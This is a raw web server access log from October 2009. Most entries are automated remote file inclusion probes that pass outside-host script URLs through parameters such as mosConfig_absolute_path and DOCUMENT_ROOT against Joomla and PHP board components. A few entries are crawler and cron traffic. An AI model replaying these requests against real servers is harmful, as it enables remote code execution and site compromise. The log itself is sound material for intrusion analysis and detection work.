69.237.82.158 - - [30/Oct/2009:11:22:47 -0700] "GET /logs/access_090213.log//index.php?DOCUMENT_ROOT=http://www.mecgrassroots.org/wp-content/gallery/events/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
69.237.82.158 - - [30/Oct/2009:11:22:49 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mecgrassroots.org/wp-content/gallery/events/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
69.237.82.158 - - [30/Oct/2009:11:22:50 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.mecgrassroots.org/wp-content/gallery/events/thumbs/id.txt??? HTTP/1.1" 200 15963 "-" "libwww-perl/5.814" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:22:55 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:23:01 -0700] "GET /logs/access_080617.log HTTP/1.0" 200 2711267 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.115.225 - - [30/Oct/2009:11:23:02 -0700] "GET /blog/index.php/2008/04/12/ HTTP/1.0" 200 12689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:23:04 -0700] "GET /logs/access_080313.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:23:20 -0700] "GET /logs/access_090731.log////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.246.79.115 - - [30/Oct/2009:11:23:21 -0700] "GET /mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.246.79.115 - - [30/Oct/2009:11:23:21 -0700] "GET /logs/access_080901.log//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.246.79.115 - - [30/Oct/2009:11:23:21 -0700] "GET /logs//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:23:25 -0700] "GET /logs/access_080313.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.246.79.115 - - [30/Oct/2009:11:23:27 -0700] "GET /logs/access_080414.log//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:32 -0700] "GET /logs/access_081104.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:33 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:33 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16046 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:11:23:33 -0700] "GET /logs/access_090223.log%20%20/?sourcedir=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:38 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16046 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:38 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:39 -0700] "GET /logs/access_081104.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:39 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:39 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16046 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:23:39 -0700] "GET /logs/access_081104.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:23:43 -0700] "GET /logs/access_080313.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:11:23:54 -0700] "GET /logs/access_080518.log%20%20/?sourcedir=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:24:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:24:01 -0700] "GET /skin/zero_vote/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:24:01 -0700] "GET /logs/access_080126.log%20%20//skin/zero_vote/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:24:20 -0700] "GET /logs/access_090704.log%20%20//skin/zero_vote/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:31 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:31 -0700] "GET /logs/access_081104.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:32 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16046 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:24:34 -0700] "GET /logs/access_080126.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:24:34 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:24:34 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:34 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:34 -0700] "GET /logs/access_081104.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:34 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16046 "-" "Mozilla/5.0" "www.dmulk.com"
201.218.228.226 - - [30/Oct/2009:11:24:38 -0700] "GET /logs/access_080509.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.okeg.co.kr//bbs/data/css/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:39 -0700] "GET /logs/access_081104.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:39 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:24:40 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 16046 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:24:55 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:24:55 -0700] "GET /logs/access_080531.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:24:55 -0700] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15972 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:25:06 -0700] "GET /logs/access_090208.log HTTP/1.0" 200 2936449 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:25:13 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:25:38 -0700] "GET /logs/access_090731.log////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:25:46 -0700] "GET /logs/access_080501.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:25:59 -0700] "GET /logs/access_080313.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:11:26:01 -0700] "GET /logs/access_081230.log//board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:26:01 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:26:01 -0700] "GET /?path%5Bdocroot%5D=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 200 16074 "-" "Mozilla/5.0" "www.dmulk.com"
79.64.224.47 - - [30/Oct/2009:11:26:02 -0700] "GET /logs/access_080901.log//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.64.224.47 - - [30/Oct/2009:11:26:03 -0700] "GET /logs//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.64.224.47 - - [30/Oct/2009:11:26:03 -0700] "GET /mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.64.224.47 - - [30/Oct/2009:11:26:03 -0700] "GET /logs/access_080414.log//mcf.php?content=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:26:05 -0700] "GET /logs/access_081202.log%20%20//?path%5Bdocroot%5D=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:26:05 -0700] "GET /logs/access_080330.log%20%20//?path%5Bdocroot%5D=http://www.hotlinkfiles.com/files/2422783_g1tq6/i.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:26:28 -0700] "GET /logs/access_080313.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:26:31 -0700] "GET /logs/access_080313.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:26:32 -0700] "GET /logs/access_081117.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:26:35 -0700] "GET /logs/access_081117.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [30/Oct/2009:11:26:37 -0700] "GET /logs/access_081117.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:26:40 -0700] "GET /logs/access_080313.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:28:09 -0700] "GET /bikes/dteel/2008_07_03/?N=D HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:28:28 -0700] "GET /skin/zero_vote/error.php?dir=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:28:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:28:29 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:28:41 -0700] "GET /logs/access_090613.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:28:41 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:11:28:43 -0700] "GET /logs/access_090409.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:28:44 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:11:28:44 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:11:28:44 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:29:26 -0700] "GET /logs/access_080725.log HTTP/1.0" 200 2122982 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:29:26 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:29:26 -0700] "GET /logs/access_080530.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:29:26 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:29:26 -0700] "GET /logs/access_080518.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.85.35.200 - - [30/Oct/2009:11:29:27 -0700] "GET /logs/access_090623.log///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/chid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
212.85.35.200 - - [30/Oct/2009:11:29:29 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/chid.txt??? HTTP/1.1" 200 123789 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.157.4.41 - - [30/Oct/2009:11:29:31 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
212.85.35.200 - - [30/Oct/2009:11:29:31 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/chid.txt??? HTTP/1.1" 200 16055 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.214.25.101 - - [30/Oct/2009:11:30:15 -0700] "GET /logs/access_081111.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.25.101 - - [30/Oct/2009:11:30:15 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.25.101 - - [30/Oct/2009:11:30:15 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://imagehut.ws/images2/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:30:58 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:30:58 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:30:58 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.812" "www.dmulk.com"
70.99.241.34 - - [30/Oct/2009:11:31:02 -0700] "GET /logs/access_090311.log HTTP/1.1" 200 1572864 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0" "www.dmulk.com"
212.85.35.200 - - [30/Oct/2009:11:31:03 -0700] "GET /logs/access_081121.log///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/chid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:31:29 -0700] "GET /logs/access_081202.log%20%20//?path%5Bdocroot%5D=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:31:29 -0700] "GET /logs//?path%5Bdocroot%5D=http://n34.biz/id1.txt??? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:31:29 -0700] "GET /?path%5Bdocroot%5D=http://n34.biz/id1.txt??? HTTP/1.1" 200 16036 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:31:33 -0700] "GET /logs/access_080330.log%20%20//?path%5Bdocroot%5D=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:31:34 -0700] "GET /logs/access_081202.log%20%20//?path%5Bdocroot%5D=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:31:34 -0700] "GET /?path%5Bdocroot%5D=http://n34.biz/id1.txt??? HTTP/1.1" 200 16035 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:31:35 -0700] "GET /logs//?path%5Bdocroot%5D=http://n34.biz/id1.txt??? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
85.111.12.199 - - [30/Oct/2009:11:31:39 -0700] "GET /logs/access_080330.log%20%20//?path%5Bdocroot%5D=http://n34.biz/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.99.241.34 - - [30/Oct/2009:11:32:03 -0700] "GET /logs/access_090311.log HTTP/1.1" 200 1966080 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:32:06 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:32:09 -0700] "GET /logs/access_090326.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:32:09 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:32:10 -0700] "GET /logs/access_080602.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:32:10 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:32:10 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:32:24 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:11:32:26 -0700] "GET /logs/access_090121.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:32:40 -0700] "GET /logs/access_080718.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:11:32:45 -0700] "GET /skin/zero_vote/error.php?dir=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
